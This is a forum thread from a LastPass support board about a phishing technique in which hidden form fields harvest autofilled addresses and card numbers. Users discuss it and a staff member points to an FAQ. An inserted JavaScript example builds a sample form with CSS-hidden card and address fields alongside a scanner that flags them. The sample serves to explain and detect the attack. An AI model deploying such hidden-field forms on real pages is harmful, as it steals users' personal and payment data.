Lastpass Autofill Phishing Attack

auto-filling hidden fields

Postby 10sTroy » Wed Jan 06, 2016 1:32 pm

So, in the following, in the words of the great Strother Martin, "What we've got here is failure to communicate." The following is a dialog with Lastpass about their filling "hidden" fields on a page.

2016-01-05 20:40
Dmitrij: https://yoast.com/research/autocompletetype.php doesn't have any 'potentially insecure' forms like mentioned in the FAQ.

If you check the page source you can see all of the form fields - view-source:https://yoast.com/research/autocompletetype.php - they aren't really 'hidden'; they are just not visible to the human eye. The submit button just visually reveals these form fields; they are not hidden in any form, they just aren't visible to users based on the page design.

So there is really nothing to worry about when it comes to using form fields with LastPass.
2016-01-05 19:33
You: Thank you for the prompt response. I checked and I do have the "warn before filling insecure..." checked. So when you say "it's expected that the software will try to match all possible form fields.", does that include hidden fields if they are seen as "secure"?
2016-01-05 18:53
Dmitrij: Hello,

You are manually submitting your form fills profile, so it's expected that the software will try to match all possible form fields.

However, insecure form fields will not be auto-filled by default and you will see a warning message on such pages unless you have disabled the following security feature:

https://lastpass.com/support.php?cmd=showfaq&id=7336

Kind regards,
Dmitrij
2016-01-05 16:26
You: (attachment: lastpass f... (691.9 KB)) Lastpass fills hidden fields in a page. I hope that it does not do that with credit card info, but in any case, I don't want anything filled that I am not aware of like my address. Please fix. Thanks, Troy

By the way, I LOVE the problem steps recorder that you recommended. See attached.
10sTroy
 
Posts: 2
Joined: Sat Oct 17, 2015 5:42 pm

Lastpass Autofill Phishing Attack

Postby sydlexius » Mon Jan 09, 2017 7:36 pm

With credit to Viljami Kuosmanen, I can confirm that Lastpass 4.1.32a (via Firefox nightly) will fill in hidden fields, allowing a malicious site to obtain more information than intended. Example code here, and demo here.
sydlexius
 
Posts: 8
Joined: Wed Apr 11, 2012 7:04 pm

Re: Lastpass Autofill Phishing Attack

Postby mhast123 » Tue Jan 10, 2017 8:57 am

Guardian have picked it up. Wonder if LP will pay some attention now:
https://www.theguardian.com/technology/ ... are_btn_tw
mhast123
 
Posts: 1
Joined: Tue Jan 10, 2017 8:56 am

Re: Lastpass Autofill Phishing Attack

Postby WhoKnowsMe73 » Tue Jan 10, 2017 9:11 am

This is now being reported as a vulnerability on the register website. Would be reassuring to see a LastPass response/fix?

http://www.theregister.co.uk/2017/01/10 ... ari_crims/
WhoKnowsMe73
 
Posts: 2
Joined: Tue Jun 23, 2015 4:41 pm

Browser autofill used to steal personal details

Postby Andy433 » Tue Jan 10, 2017 12:42 pm

Browser autofill used to steal personal details in new phishing attack
https://www.theguardian.com/technology/ ... ?CMP=fb_gu

Are you aware of that risk and is Lastpass working on a solution?
Andy433
 
Posts: 2
Joined: Mon Feb 15, 2016 5:48 pm

Re: Browser autofill used to steal personal details

Postby peteskitoo105 » Tue Jan 10, 2017 1:33 pm

I have the same question. I tested the phishing test site and LastPass will indeed ask to fill in credit card information even though I hadn't told LastPass to do that:
https://anttiviljami.github.io/browser- ... -phishing/
I am very concerned about using a feature that can get more data out of me than I am expecting of course.
peteskitoo105
 
Posts: 3
Joined: Thu Apr 21, 2016 1:44 pm

Re: Lastpass Autofill Phishing Attack

Postby tomLP » Tue Jan 10, 2017 3:20 pm

Please see our FAQ documentation regarding this matter here https://lastpass.com/support.php?cmd=showfaq&id=11012
tomLP
 
Posts: 23
Joined: Thu Dec 11, 2014 5:22 pm

Re: Lastpass Autofill Phishing Attack

Postby sydlexius » Tue Jan 10, 2017 3:34 pm

While Autofill may be an optional feature, there must have been a reason why Marvasol decided it was worth the cost and effort to duplicate a feature found in many of the browsers that you've developed the extension for. Indeed it's valued enough to add features such as credit monitoring. Many of the steps discussed in the FAQ are onerous for a layperson. Further, the vaguely-worded "potentially insecure" prompt doesn't even come up in one of the aforementioned test sites.

Most of the discussions I've seen at large have suggestions such as adding "summary" screen that pops up when you select an autofill option that shows you which fields are being filled, and perhaps even offers a checkbox that allows for you to deselect individual items. Obviously that requires further development and testing of your product, which may prove to be a duplication of the major browser ISVs' efforts.
sydlexius
 
Posts: 8
Joined: Wed Apr 11, 2012 7:04 pm

Re: Lastpass Autofill Phishing Attack

Postby peteskitoo105 » Tue Jan 10, 2017 7:21 pm

tomLP Wrote:Please see our FAQ documentation regarding this matter here https://lastpass.com/support.php?cmd=showfaq&id=11012


Thank you this was useful.
One thing I noticed however with the phishing attack sample site https://anttiviljami.github.io/browser- ... -phishing/ is that my default form with basic information DOES NOT have my credit card information, I use a second form fill for that, but when I fill this form with the non-credit card info, it still asks if I want to fill the credit card info. Will this just use the empty fields from the first form fill?
One way to help address this is to prompt the user for exactly what information and fields are going to be submitted to the website in a pop-up prompt and letting the user see for themselves; at least if there was more information than expected being given up, that would help the end-user determine that.
peteskitoo105
 
Posts: 3
Joined: Thu Apr 21, 2016 1:44 pm
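The attack sydlexius reports above (a form whose visible fields are name and email, with address and card fields the user never sees) and the "summary screen" that sydlexius and peteskitoo105 ask for, as one added example. This is not code from the thread, from LastPass, or from Kuosmanen's demo page: the form, its field names, the action URL and the CSS hiding tricks are constructed for the example, and the page scan is a regex pass over static page source (what the thread suggests checking with view-source:), not a real DOM, so it only catches hiding done in the markup itself.

```javascript
// Added example (not the forum's, LastPass's or Kuosmanen's code).
// Constructed sample page: two fields the user sees, four hidden by
// different CSS tricks, and one type="hidden" input. Names are assumptions.
const SAMPLE_FORM = `
<form action="https://example.invalid/submit" method="post">
  <input type="text" name="name" autocomplete="name">
  <input type="email" name="email" autocomplete="email">
  <div style="position:absolute; left:-5000px">
    <input type="text" name="phone" autocomplete="tel">
    <input type="text" name="address" autocomplete="street-address">
  </div>
  <input type="text" name="cc-number" autocomplete="cc-number" style="display:none">
  <input type="text" name="cc-exp" autocomplete="cc-exp" style="opacity:0;height:0">
  <input type="hidden" name="csrf" value="abc">
  <button type="submit">Send</button>
</form>`;

// CSS patterns that keep a field submittable while making it invisible.
const HIDING_RULES = [
  [/display\s*:\s*none/i, 'display:none'],
  [/visibility\s*:\s*hidden/i, 'visibility:hidden'],
  [/opacity\s*:\s*0(?:\.0+)?\s*(?:;|$)/i, 'opacity:0'],
  [/\b(?:height|width)\s*:\s*0(?:px)?\s*(?:;|$)/i, 'zero size'],
  [/\b(?:left|top|right|bottom)\s*:\s*-\d{3,}/i, 'positioned off-screen'],
];

// Pull one attribute value out of a tag's attribute string (heuristic:
// a data-name="..." attribute would also match "name").
function getAttr(attrs, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = re.exec(attrs);
  return m ? (m[1] || m[2] || m[3] || null) : null;
}

// Why an element's own style makes it invisible, or null if it looks visible.
function hidingReason(attrs) {
  const style = getAttr(attrs, 'style') || '';
  for (const [re, reason] of HIDING_RULES) if (re.test(style)) return reason;
  return null;
}

// Walk the tags in order, keeping a stack of open containers so a field
// inside an off-screen <div> is reported as hidden even though its own
// style attribute is clean. Void elements are never pushed on the stack.
function scanFields(html) {
  const VOID = new Set(['input', 'br', 'img', 'hr', 'meta', 'link']);
  const tagRe = /<(\/?)([a-zA-Z][\w-]*)([^>]*)>/g;
  const fields = [];
  const stack = []; // hiding reason of each open ancestor (null = visible)
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const closing = m[1] === '/';
    const tag = m[2].toLowerCase();
    const attrs = m[3];
    if (closing) { stack.pop(); continue; }
    if (tag === 'input') {
      const type = (getAttr(attrs, 'type') || 'text').toLowerCase();
      let reason = type === 'hidden' ? 'type=hidden' : hidingReason(attrs);
      if (!reason) reason = stack.find((r) => r !== null) || null;
      fields.push({ name: getAttr(attrs, 'name'), autocomplete: getAttr(attrs, 'autocomplete'), reason });
      continue;
    }
    if (!VOID.has(tag) && !attrs.trim().endsWith('/')) stack.push(hidingReason(attrs));
  }
  return fields;
}

// The summary the thread asks for: what a user would actually hand over
// if every matching field on the page were filled.
function autofillSummary(html) {
  const fields = scanFields(html);
  return {
    visible: fields.filter((f) => !f.reason).map((f) => f.name),
    hidden: fields.filter((f) => f.reason).map((f) => `${f.name} (${f.reason})`),
  };
}

console.log(autofillSummary(SAMPLE_FORM));
```

On the sample page the scan lists only name and email as visible and flags phone, address, cc-number, cc-exp and csrf with the trick that hides each one; a filler that showed this list before submitting would have answered the "what exactly am I giving up?" question raised in the posts above. The check is deliberately conservative: anything it cannot classify is reported as visible, so it complements rather than replaces reading the page source.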

Browser autofill used to steal personal details in new phish

Postby westcoastsurf » Tue Jan 10, 2017 8:47 pm

Chrome, Safari, Opera and extensions such as LastPass can be tricked into leaking private information using hidden text boxes, developer finds

https://www.theguardian.com/technology/ ... ome-safari

Finnish web developer and hacker Viljami Kuosmanen discovered that several web browsers, including Google’s Chrome, Apple’s Safari and Opera, as well as some plugins and utilities such as LastPass, can be tricked into giving away a user’s personal information through their profile-based autofill systems

Users can protect themselves from this kind of phishing attack by disabling the autofill system within their browser or extension settings.


https://helpdesk.lastpass.com/extension-preferences/#h2 (general tab)

Automatically Fill Login Information: This default setting instructs LastPass to autopopulate any stored login fields (such as username and password) when you navigate to a stored URL.

How to change this:

Right click the LastPass plugin icon in your browser toolbar, select Options, and uncheck "Automatically Fill Login Information".
westcoastsurf
 
Posts: 1
Joined: Tue Jan 10, 2017 8:27 pm
